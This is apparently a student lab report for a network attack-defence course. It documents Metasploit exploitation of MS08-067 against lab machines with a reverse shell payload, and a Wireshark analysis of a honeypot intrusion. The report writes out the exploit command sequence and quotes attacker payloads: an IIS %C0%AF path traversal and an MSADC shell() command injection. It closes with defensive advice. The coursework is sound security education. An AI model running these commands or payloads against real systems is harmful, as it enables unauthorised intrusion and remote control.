20252904 2025-2026-2 《网络攻防实践》第6周作业
20252904 2025-2026-2 《网络攻防实践》第6周作业
1.实践内容
1.1 实验要求
1.Metasploit Windows 渗透实操:以 MS08-067 漏洞为目标,通过攻击机利用 Metasploit 对 Windows Metasploitable 靶机进行远程渗透,掌握漏洞利用、载荷配置与权限获取的完整攻击流程,理解工具在实战中的使用方法。
2.蜜罐攻击取证分析:对攻陷蜜罐主机的真实攻击流量进行解码,从攻击者使用的工具、漏洞利用过程、入侵后操作、痕迹特征等维度,完整还原一次攻击链,并基于流量行为判断攻击者是否识别蜜罐,掌握攻击溯源与取证分析的关键方法。
3.团队攻防对抗实践:攻方使用 Metasploit 选择漏洞发起攻击并获取目标控制权,防守方通过 Wireshark 捕获流量并分析攻击过程,双方在对抗中分别掌握攻击流程、流量特征识别与防御思路,理解攻防双方的技术逻辑与对抗要点。
1.2知识点整理
1.Metasploit windows attacker介绍:Metasploit Windows 攻击模块是一个集成漏洞探测、利用、载荷生成与后渗透功能的渗透测试工具集,它内置了大量 Windows 系统及组件的漏洞利用代码,支持生成反向 shell、Meterpreter 等控制载荷,攻击成功后可实现权限提升、信息收集、持久化控制与内网横向移动。
2.MS08-067 漏洞原理:Windows Server 服务中的远程代码执行漏洞,攻击者通过构造恶意 RPC 请求,可在未授权情况下执行任意代码,获取系统权限。
2.实践过程
2.1实践Metasploit windows attacker攻击过程
本次metasploit软件进行windows远程渗透统计实验,kali虚拟机为攻击机,而window为靶机。
kali地址为192.168.200.6

而靶机WINXP虚拟机地址为192.168.200.13,现在开始进行实验。

开始实验。输入下面三条命令。
service postgresql start # 启动PostgreSQL数据库
msfdb init # 初始化Metasploit数据库
msfconsole # 启动MSF控制台,命令符会变成msf>

search ms08_067
搜索所有与 ms08_067 相关的漏洞利用模块,后面可以利用这些寻找到的模块来验证漏洞。

use exploit/windows/smb/ms08_067_netapi
利用 Windows Server Service 中的 MS08-067 远程代码执行漏洞模块进行攻击!

show payloads
列出当前漏洞模块支持的所有 payload,咱们可以知道自己使用这个命令模块攻击成功后有哪些服务我自己能够使用,有什么功能。

show options
输入这条命令,就是展示我使用模块攻击的话,我需要输入什么内容才能实现攻击。

set payload generic/shell_reverse_tcp
选择 generic/shell_reverse_tcp 作为攻击载荷,用于在目标主机上建立反向连接,获取命令行交互权限。

set RHOSTS 192.168.200.13
通过set RHOSTS命令将漏洞攻击目标主机 IP 地址设置为192.168.200.13,就是这次实验对象WINXP。

show options
再次查看配置情况,发现地址已经设置好,并且是445端口,那应该说明本次攻击是通过445端口实现的。

exploit
之前配置完成后,这次是真正进行攻击。通过询问豆包,Command shell session 1 opened说明咱们成功拿到了靶机的命令行会话,C:\WINNT\system32>是 Windows 2000 的系统目录提示符,说明咱们已经进入靶机的系统了,Shell Banner: Microsoft Windows 2000 [Version 5.00.2195]:确认靶机系统是 Windows 2000 SP0,也和自动识别的结果对应上了。
最后出现了WINXP的命令行,说明攻击成功。

2.2取证分析实践,解码一次成功的NT系统破解攻击
将snort-0204@0117.log文件(在学习通实践六中)复制到kali里。用wireshark打开。

ip.addr == 172.16.1.106 and http
筛选出所有与 IP 地址 172.16.1.106 相关,并且协议类型是 HTTP 的数据包。
这个过滤条件会显示:
- 由
172.16.1.106发出的 HTTP 数据包; - 发往
172.16.1.106的 HTTP 数据包。
这些流量包括HTTP协议的通信,其中一些请求返回了200 OK状态码,表示请求成功。

在浏览172.16.1.106与213.116.251.162之间传输的数据包显示,出现/guest/default.asp..%C0%AF./…%C0%AF…1…%C0%AF…/boot.ini HTTP/1.1的请求。进行追踪流查看信息tcp stream。
上网查资料显示%C0%AF 是经典的畸形 UTF-8 编码,等价于 \,用于绕过 WAF、防火墙、代码路径过滤。说明213.116.251.162对172.16.1.106进行了攻击,是 IIS 经典漏洞攻击!


当攻击机尝试绕过IIS 的目录限制,并尝试读取服务器系统盘的boot.ini文件。但靶机对攻击机传的数据包作出了HTTP/1.1 200 OK回应,说明服务器没有拦截这个请求,直接返回了结果。

然后抓包的数据包里里反复出现这些请求:
GET /msadc/msadc.dll HTTP/1.0
POST /msadc/msadc.dll/AdvancedDataFactory.Query HTTP/1.1
/msadc/msadc.dll说明攻击机通过远程代码执行漏洞使用远程数据服务组件,并且AdvancedDataFactory.Query 说明攻击者利用该漏洞执行 SQL / 系统命令的典型调用,每次攻击被攻击机都会返回HTTP/1.1 200 OK回应,说明请求被成功执行。

追踪这个流,详细看攻击机到底要干什么。

通过数据流可以观察到虽然是数据库搜索语句。但是后面加了一句'|shell("cmd /c echo werd > c:\fun")|'说明了攻击者的行为创建一个文件来验证攻击行为成功,创建成功说明已经控制了被攻击机。!ADM!ROX!YOUR!WORLD!是攻击者做了一个特殊标记。

我们继续观察其他的数据包,可以发现攻击者拥有了主机权限之后,做了一个删除ftpcom的操作
del ftpcom
攻击者做这个操作,可能是为了掩盖自己攻击痕迹,但是咱们一直进行着数据包的抓取哈哈。

并且攻击者还犯了操作指令的错误,以为是linux系统,使用了ls指令,服务器反馈了错误提示信息。后面才知道是winxp系统

在这里拉取了用户信息以及管理员信息

用户进行了下载操作。下载了nc.exe,pdump.exe等。

这里是攻击者尝试创建后门账户的操作,为了方便后面直接通过自己账户进入服务器。

最后可能没有成功创建后门,获取更高权限。攻击者在电脑中写入了har.txt文件

作业问题:
1.攻击者使用了什么破解工具进行攻击?
答:通过MSADC/MDAC RDS 漏洞利用脚本完成攻击,一开始通过扫描工具(不断发送gif)确认服务器的基本信息,利用服务器漏洞完成攻击。

具体是通过/msadc/msadcs.dll/AdvancedDataFactory.Query,攻击者构造恶意的 SQL 查询语句,让服务器执行系统命令,拿到交互式 shell。
2.攻击者如何使用这个破解工具进入并控制了系统?
向 echo best honeypot i've seen till now 😃 > rfp.txt/msadc/msadcs.dll/AdvancedDataFactory.Query发送恶意 POST 请求,利用multipart/mixed格式和application/x-varg标记,绕过服务器过滤。再通过构造混淆的 SQL 语句,shell()函数调用cmd.exe`,在服务器上执行命令,成功拿到交互式命令行 shell。
3.攻击者获得系统访问权限后做了什么?
遍历了各个文件系统结构后,有大量的dir,cd操作。并且执行了删除操作,清楚痕迹。下载了一些工具软件,尝试提升自己权限。而且尝试创建后门账户,方便后续访问。最后上传了一些txt文件。
4.我们如何防止这样的攻击?
- 漏洞修复与组件移除
- 立即移除 IIS 中的
/msadc/目录,或禁用msadcs.dll组件,从根源上消除漏洞入口。 - 升级 IIS 和 MDAC 组件到安全版本,安装 MS02-065 对应的安全补丁。
- 立即移除 IIS 中的
- 服务器配置加固
- 限制 IIS 服务账户的权限,禁止其执行系统命令、访问系统关键目录(如
C:\winnt)。 - 配置 IIS 路径过滤,拦截包含
../、..%C0%AF等路径穿越特征的请求。 - 禁用不必要的 HTTP 方法,限制
POST请求对敏感目录的访问。
- 限制 IIS 服务账户的权限,禁止其执行系统命令、访问系统关键目录(如
- 网络与流量防护
- 部署 Web 应用防火墙(WAF),拦截包含
msadcs.dll/AdvancedDataFactory.Query等攻击特征的请求。 - 限制外网对服务器 80 端口的直接访问,通过反向代理或 VPN 控制访问权限。
- 定期监控服务器日志和网络流量,及时发现异常命令执行和文件操作行为。
- 部署 Web 应用防火墙(WAF),拦截包含
- 版本与系统升级
- 老旧的 Windows 2000/IIS 4.0 系统早已停止支持,存在大量高危漏洞,应尽快升级到受支持的操作系统和 Web 服务版本。
5.你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
攻击者最终明确警觉了目标是蜜罐主机,并且用写入文件的方式直接留下了证据。在流中一段这样的话,echo best honeypot i've seen till now :) > rfp.txt简单翻译就是这是我迄今为止见过最棒的蜜罐 :)

2.3团队对抗实践:windows系统远程渗透攻击和分析
本次实验是跟石幸龙同学合作完成的实验,进行了攻防两次实验。
| 姓名 | KALI | WIN2K |
|---|---|---|
| 张峻源 | 172.20.10.5 | 172.20.10.6 |
| 石幸龙 | 172.20.10.3 | 172.20.10.4 |
首先把虚拟机网络调成桥接模式,让主机网络跟虚拟机网络一致,这样在局域网内两人的主机会在同一网段内。

在这里配置网络,让网络调成自动获取IP地址,这样操作更加方便。


当设置完毕后,查看网络情况。首先看kali机是172.20.10.5。

winxp这里的IP地址是172.20.10.6

并且跟石幸龙同学的虚拟机能完美PING通。

KALI机同样能ping通,说明网络连接正常。

测试链接另一台虚拟机,也是正常的。

现在我是攻击方,在Kali虚拟机中输入msfconsole,启动Metasploit框架控制台

输入指令use exploit/windows/smb/ms08_067_netapi加载MS08-067漏洞的核心利用模块。

输入指令show payloads列出该漏洞可兼容的攻击载荷,查看能在靶机上执行的动作

输入指令set payload generic/shell_reverse_tcp 设置反向TCP Shell载荷。

输入指令 set RHOST 172.20.10.4 设置Win2kServer被攻击机的IP。输入指令set LHOST 172.20.10.5设置Kali攻击机的IP。

show options
查看配置是否已经配好,发现已经准备就绪。

exploit
跟之前第一部分一样,进行攻击!这里我们可以看到已经进入石幸龙同学的靶机,获得访问控制权。

分别输入以下指令,创建一个自己的文件夹,进入并创建文件写下标记内容
mkdir zhangjunyuan
cd zhangjunyuan进入该文件夹
echo I am zhangjunyuan 20252904>>Test.txt

这时通过石幸龙的视角查看,我们的攻击是成功的,并且完美的创建文件留下记录。

因为当时试过攻击winxp没有试验成功,经过查询资料发现可能是因为winxp已经修补好漏洞了。不过这里抓包记录了石幸龙同学的抓包记录。

因为之前实验时时间不足,后面重新做的实验,导致IP地址出现了变化,现在是192.168.1.105

kali成了192.168.1.107,对方kali是192.168.1.104

在石幸龙同学攻击的过程中我们打开抓包,记录整个攻击过程。

这里可以观察到攻击者(石幸龙)拿到服务器 shell 后,产生大量的建立交互式命令行会话流量。

并在最后一段数据流中查看到,具体的操作内容。并且同样的留下一段 I am sxl 20252908 的信息。说明攻击成功。

3.学习中遇到的问题及解决
问题:在团队合作实践的时候无法连接网络,无法同一个网段。
解决方法:将网络连接调成桥接模式,并且要把静态IP调成自动获取。


问题2:在团队对抗实验中,石幸龙同学对我的WinXPattacker主机进行攻击,返回:Exploit completed, but no session was created。
问题2解决方案:考虑到可能是兼容性或漏洞已经被修复,因此修改成Win2Kserver进行实验。
4.实践总结
通过实验了解了Metasploit基本渗透流程,并且通过团队合作手动实操有了更加深刻的理解,感觉整体实验过程非常的神奇,曾经从来没有做过这样的实验。第二部分分析数据流刚入手时候有些困难,但是一点一点去钻研调查资料,发现对wireshark抓包之后,分析数据流更容易了,不会是像以前跟着视频做实验,懂的理解这一步为什么这么做,他的意义在哪里。所以这次试验也是收获满满,也认识到安全的重要性,这次试验认识到通过漏洞攻击后,对主机会带来多大的危险,能窃取你的所有信息,所以以后要对安全更加的注意。
浙公网安备 33010602011771号